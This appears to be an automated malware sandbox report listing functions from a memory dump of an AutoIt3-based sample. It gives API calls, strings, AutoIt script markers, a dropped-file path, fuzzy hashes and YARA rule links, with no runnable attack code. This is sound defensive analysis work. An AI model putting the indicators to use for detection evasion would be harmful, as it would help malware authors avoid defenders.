Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-3360698832
Opcode ID: 1b5fbb71a30627c5c4a5a17b044e0b074506bcb154ae3680af32879fa431825b
Instruction ID: 666d4e386f9134e967cae06e53bf70cffe4d81e7d4bdce9d02b23db093c00a2e
Opcode Fuzzy Hash: 1b5fbb71a30627c5c4a5a17b044e0b074506bcb154ae3680af32879fa431825b
Instruction Fuzzy Hash: 10611B71640316A7E711AB21DC43FAF335D9F51790F08801AFC05AE242EF79EB42B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB94B6
Sleep.KERNEL32(0000000A,?), ref: 00FB9721
TranslateMessage.USER32 ref: 00FB97A6
DispatchMessageW.USER32(?), ref: 00FB97B1
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB97C4

Strings

@GUI_WINHANDLE, xrefs: 00FDDA85
@GUI_CTRLHANDLE, xrefs: 00FDDAC8
@GUI_CTRLID, xrefs: 00FDDA4D

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$DispatchSleepTranslate
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 1762048999-758534266
Opcode ID: e9d83c4fca43bea3a8b7cd3e6a0cfac46dc6d7b7d7276e4b5cd072f91971780a
Instruction ID: 2a3833bfb288f06a0b497c3dd52e7d00a1f2cd2654988b443f4de11661c77b75
Opcode Fuzzy Hash: e9d83c4fca43bea3a8b7cd3e6a0cfac46dc6d7b7d7276e4b5cd072f91971780a
Instruction Fuzzy Hash: 6B6213716083029FD724DF25C884BEAB7E5BF85304F18491EF68987241D7B8E849EF92

Uniqueness

Uniqueness Score: -1.00%

Function 0101AB4D, Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101AC5C
RegCreateKeyExW.KERNEL32(?,?,00000000,01034E64,00000000,?,00000000,?,?), ref: 0101ACB6
RegCloseKey.ADVAPI32(?), ref: 0101AD00

Strings

REG_MULTI_SZ, xrefs: 0101ADF6
REG_SZ, xrefs: 0101AD83
REG_BINARY, xrefs: 0101AF75
REG_DWORD, xrefs: 0101AEE8
REG_QWORD, xrefs: 0101AF2C
REG_EXPAND_SZ, xrefs: 0101AD1B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 3217815495-966354055
Opcode ID: ced1c31daeba227615a867a594611185b61c8d2f282a7031d26940028273b19c
Instruction ID: 6444b52c3b4d42232701cf7c75323ef903f0fb939c46c21f2cde5e6805b59375
Opcode Fuzzy Hash: ced1c31daeba227615a867a594611185b61c8d2f282a7031d26940028273b19c
Instruction Fuzzy Hash: F2E15DB5604301AFD710EF69CD85F5AB7E8BF88704F04895CF9899B286DB38E901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0101ED23, Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON

Download Yara Rule

APIs

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

GetForegroundWindow.USER32 ref: 0101EE0E
GetForegroundWindow.USER32 ref: 0101F1FA
IsWindow.USER32(?), ref: 0101F22F
GetDesktopWindow.USER32 ref: 0101F2EB
EnumChildWindows.USER32 ref: 0101F2F2
EnumWindows.USER32(01011059,?), ref: 0101F2FA

Part of subcall function 00FF59E6: _wcslen.LIBCMT ref: 00FF59F6

Strings

ALL, xrefs: 0101F0DE
HANDLE, xrefs: 0101EEEF
REGEXPTITLE, xrefs: 0101EF09
INSTANCE, xrefs: 0101F0AC
REGEXPCLASS, xrefs: 0101EFA7
CLASS, xrefs: 0101EF7A
ACTIVE, xrefs: 0101EED5
LAST, xrefs: 0101EEBB
TITLE, xrefs: 0101F113

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 329138477-1919597938
Opcode ID: f2f0a6c36065d1dcd029683d96108993bf4475f0143175c48ccdd041f9bb75ea
Instruction ID: 56c2e1f814fd0a8d9c103315fa7f5f717bcb9051177bfdba2ec8b0b32f00fdd4
Opcode Fuzzy Hash: f2f0a6c36065d1dcd029683d96108993bf4475f0143175c48ccdd041f9bb75ea
Instruction Fuzzy Hash: 68F105724143019BCB10EF64DC82AEEB7E8BF85304F04495DFA855B117EB79E908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE560, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00FBE5FF
__wsplitpath.LIBCMT ref: 00FBE61C

Part of subcall function 00FC392E: __wsplitpath_helper.LIBCMT ref: 00FC3970

_wcsncat.LIBCMT ref: 00FBE633
__wmakepath.LIBCMT ref: 00FBE64F

Part of subcall function 00FC39BE: __wmakepath_s.LIBCMT ref: 00FC39D4

Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1546
Part of subcall function 00FC14F7: std::exception::exception.LIBCMT ref: 00FC1560
Part of subcall function 00FC14F7: __CxxThrowException@8.LIBCMT ref: 00FC1571

_wcscpy.LIBCMT ref: 00FBE687

Part of subcall function 00FBE6C0: RegOpenKeyExW.KERNEL32 ref: 00FBE6DD

_wcscat.LIBCMT ref: 00FD7324
_wcslen.LIBCMT ref: 00FD7334
_wcslen.LIBCMT ref: 00FD7345
_wcscat.LIBCMT ref: 00FD735F
_wcsncpy.LIBCMT ref: 00FD739F

Strings

Include, xrefs: 00FBE62D
\, xrefs: 00FD734D
`<e, xrefs: 00FBE593
8b, xrefs: 00FBE5FA, 00FBE664, 00FBE672, 00FD7377, 00FD7385
db, xrefs: 00FBE5D7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
String ID: 8b$Include$\$`<e$db
API String ID: 3173733714-817890709
Opcode ID: 032a0c879b9ac01f4803f14c66b8036c7f1d0e9d9cf9c97b9bc137f0a6fe3bce
Instruction ID: 7a56ee69ea3de0c6b662f7ce02baa5a76cc89241637a76663dd19d4cc72798fd
Opcode Fuzzy Hash: 032a0c879b9ac01f4803f14c66b8036c7f1d0e9d9cf9c97b9bc137f0a6fe3bce
Instruction Fuzzy Hash: 6B51BDB2804340DBC720EF66E886DAB77E8FB89308F40491EF5C987245E77A9644DB56

Uniqueness

Uniqueness Score: -1.00%

Function 0100CD0B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0100CE26
__wsplitpath.LIBCMT ref: 0100CE65
_wcscat.LIBCMT ref: 0100CE78
_wcscat.LIBCMT ref: 0100CE8B
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CE9F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0100CEB2

Part of subcall function 00FE397D: GetFileAttributesW.KERNEL32(?), ref: 00FE3984

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CEF2
SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CF0A
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CF1B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CF2C
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CF40
_wcscpy.LIBCMT ref: 0100CF4E
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0100CF91

Strings

*.*, xrefs: 0100CF48

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 1153243558-438819550
Opcode ID: 55e5c1aa6241625d7af111ff478be4041bcdebebbbe4f84e6d004d1f3e1aa3e1
Instruction ID: 707b6bb1f83d24594f740db167e430994d7e51e018164ce2a66408873e7f64d7
Opcode Fuzzy Hash: 55e5c1aa6241625d7af111ff478be4041bcdebebbbe4f84e6d004d1f3e1aa3e1
Instruction Fuzzy Hash: D271D6729002099BFB35EB58CD84AEEBBB8BB45300F1486EAE585D7180D6759AC4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FBA9D0, Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON

Download Yara Rule

Strings

Default, xrefs: 00FDB2A4

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc
String ID: Default
API String ID: 1579825452-753088835
Opcode ID: 3c70a105fe060661c3dfdd6c2f5d93aabe534cc3629fdf7d51f42e4fe0bd5f39
Instruction ID: a16f276e5db4e8727d51a9fe7aeb5f16f5aa881aa83917bf2c3184fd9dc118a8
Opcode Fuzzy Hash: 3c70a105fe060661c3dfdd6c2f5d93aabe534cc3629fdf7d51f42e4fe0bd5f39
Instruction Fuzzy Hash: F6728CB1A04301DFC724DF26C881BAAB7E5AF89314F18885DE8968B351D739E845EF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FBFE90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00FBFED3
_memmove.LIBCMT ref: 00FBFEE2
__fread_nolock.LIBCMT ref: 00FBFF02
_fseek.LIBCMT ref: 00FBFF58

Strings

AU3!, xrefs: 00FBFECD
EA06, xrefs: 00FD5CB6

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock_fseek_memmove_strcat
String ID: AU3!$EA06
API String ID: 1268643489-2658333250
Opcode ID: 06eac005661ef67a8c5da17b03bf048845074068d57a4f686dca21eefa3e3976
Instruction ID: b6097ec0e7c7ebb68aa7adf04a57a27c56cf10611e0714fcbb41e5b28834f81a
Opcode Fuzzy Hash: 06eac005661ef67a8c5da17b03bf048845074068d57a4f686dca21eefa3e3976
Instruction Fuzzy Hash: 0A416972A041499BCF11CBA8CC91FFD3B65AB0A300F6845BDF595CB242E634A589EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1340, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129timewindowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00FB1376
KillTimer.USER32 ref: 00FB13F9

Part of subcall function 00FB1240: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FB129B

PostQuitMessage.USER32 ref: 00FB140B

Strings

TaskbarCreated, xrefs: 00FB142B

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: IconKillMessageNotifyPostProcQuitShell_TimerWindow
String ID: TaskbarCreated
API String ID: 3067442764-2362178303
Opcode ID: 7ac0b512ec20bd98e132fd212f4e9b0e9f9b6e9ffa76ade3dfbc8beb4f666e9e
Instruction ID: 1baf916f9f9d5288324cfe20b483907ab2a603e19e99a69d06769984abd37042
Opcode Fuzzy Hash: 7ac0b512ec20bd98e132fd212f4e9b0e9f9b6e9ffa76ade3dfbc8beb4f666e9e
Instruction Fuzzy Hash: 92412772B042089BEB30DB9AEC95BEE3799F744320F884157F94487580E77A9C50AB96

Uniqueness

Uniqueness Score: -1.00%

Function 00FE35B2, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00FE3229: _wcsncpy.LIBCMT ref: 00FE3241

_wcslen.LIBCMT ref: 00FE35D7
GetFileAttributesW.KERNEL32(?), ref: 00FE3601
GetLastError.KERNEL32 ref: 00FE3610
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE3624
_wcsrchr.LIBCMT ref: 00FE364B

Part of subcall function 00FE35B2: CreateDirectoryW.KERNEL32(?,00000000), ref: 00FE368C

Strings

\, xrefs: 00FE35E3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
String ID: \
API String ID: 321622961-2967466578
Opcode ID: d623a64e0166599c3c00d9a59ee5cb0337dce2515b42e27b94431dd6b944c4a4
Instruction ID: 3796e6755c2a34db9c2ee2f9bcd6452034b9b502577329818aabb500aa4736b3
Opcode Fuzzy Hash: d623a64e0166599c3c00d9a59ee5cb0337dce2515b42e27b94431dd6b944c4a4
Instruction Fuzzy Hash: 6F213876D413146ACF20AB75AC0FFEA336C9F52320F004695FC18C3242EA759A94AAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01017377, Relevance: 12.3, APIs: 8, Instructions: 267COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 01017405

Part of subcall function 00FC14F7: _malloc.LIBCMT ref: 00FC1511

_memmove.LIBCMT ref: 01017466
_memmove.LIBCMT ref: 01017497
_memmove.LIBCMT ref: 010174F3
_memmove.LIBCMT ref: 01017585
_memmove.LIBCMT ref: 010175AC

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_malloc
String ID:
API String ID: 1938898002-0
Opcode ID: 70b2534e6d4ad965253bb6ae0f5a1da5000bea286c6b8387bdb3afa739e21fbb
Instruction ID: 0650dfb0999d0513f7b3a930eb54a6b4d22d650089837673794db4d05f05577e
Opcode Fuzzy Hash: 70b2534e6d4ad965253bb6ae0f5a1da5000bea286c6b8387bdb3afa739e21fbb
Instruction Fuzzy Hash: F081C47261015A9BDB01EFA8DC42EFF77A8BF84304F040659F945A7282DF78A91597E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE700, Relevance: 10.7, APIs: 7, Instructions: 157COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00FBE72A

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

GetCurrentProcess.KERNEL32(?), ref: 00FBE7D4
GetNativeSystemInfo.KERNEL32(?), ref: 00FBE832
FreeLibrary.KERNEL32(?), ref: 00FBE842
FreeLibrary.KERNEL32(?), ref: 00FBE854

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
String ID:
API String ID: 3363477735-0
Opcode ID: 534c017094da4d9ac7ae10fcb12cf5624dc264a023d60659014fb841ec86f1d7
Instruction ID: e20702842e7f6a2e6da4c0dd090002fbf6c7edc950bfbbd85690404c824f18f8
Opcode Fuzzy Hash: 534c017094da4d9ac7ae10fcb12cf5624dc264a023d60659014fb841ec86f1d7
Instruction Fuzzy Hash: C461CD71C08786EACB11EFA4C8842DCBFB4BF0A304F18415AD44897B01D379E998DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF3B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(00FBF1FC), ref: 00FBF3BD
SHGetDesktopFolder.SHELL32(?), ref: 00FBF3D2
_wcsncpy.LIBCMT ref: 00FBF3ED
SHGetPathFromIDListW.SHELL32(?,?), ref: 00FBF427
_wcsncpy.LIBCMT ref: 00FBF440

Strings

C:\Users\user\33920049\fmkkelc.omp, xrefs: 00FBF3EB, 00FBF43F, 00FD5D72, 00FD5D73

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsncpy$DesktopFolderFromListMallocPath
String ID: C:\Users\user\33920049\fmkkelc.omp
API String ID: 3170942423-1265946250
Opcode ID: 32cdeec0c16536cafe9ead750342c4c73da0d42fe6323072d15b78f07a9e418a
Instruction ID: a56419c8daf19b66528516af19d64a58e08761bfc27a7569f746581adfbba4a7
Opcode Fuzzy Hash: 32cdeec0c16536cafe9ead750342c4c73da0d42fe6323072d15b78f07a9e418a
Instruction Fuzzy Hash: 4A217175E00619ABCB14EBA4DC85DEFB37DEF88710F108598F909D7204EA35AE45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB1490, Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB1E00: _wcsncpy.LIBCMT ref: 00FB1ED2
Part of subcall function 00FB1E00: _wcscpy.LIBCMT ref: 00FB1EF1
Part of subcall function 00FB1E00: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FB1F03

KillTimer.USER32 ref: 00FB1513
SetTimer.USER32(?,?,000002EE,00000000), ref: 00FB1522
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FD7BC8
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FD7C1C
Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00FD7C67

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
String ID:
API String ID: 3300667738-0
Opcode ID: 73e18c98fcd666b4aba919f32357667a06d200359ac420bb6217064b368ac32d
Instruction ID: 00478b6c39ce3dde9f34168a7b643faedd0152235527da7d6e53c92044fa1d27
Opcode Fuzzy Hash: 73e18c98fcd666b4aba919f32357667a06d200359ac420bb6217064b368ac32d
Instruction Fuzzy Hash: EB31E1B0A04649FFEB36DB24C895BE6FBBDBB86304F040085E1CD96244D7346A949F92

Uniqueness

Uniqueness Score: -1.00%

Function 00FBE6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 00FBE6DD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,00FBE6A1), ref: 00FD7117
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,00FBE6A1), ref: 00FD715E
RegCloseKey.ADVAPI32(?), ref: 00FD718F

Strings

Include, xrefs: 00FD710F, 00FD7158
Software\AutoIt v3\AutoIt, xrefs: 00FBE6D3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 46bdf59c32bd4386660a4d819bbf09557f798aaac43fec69f18757226dced6ed
Instruction ID: a64c23c0ab2b3cf74570321bb8c327124a19cfca8706858e94c31c5412495b59
Opcode Fuzzy Hash: 46bdf59c32bd4386660a4d819bbf09557f798aaac43fec69f18757226dced6ed
Instruction Fuzzy Hash: 8221D571B80208BBDB24DBA5DC46FEEB3BDAF54700F140159B505E7281EA75AA049750

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00FC0385
CreateWindowExW.USER32 ref: 00FC03AE
ShowWindow.USER32(?,00000000), ref: 00FC03C4
ShowWindow.USER32(?,00000000), ref: 00FC03CE

Strings

AutoIt v3, xrefs: 00FC0379, 00FC037E
edit, xrefs: 00FC03A2

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CreateShow
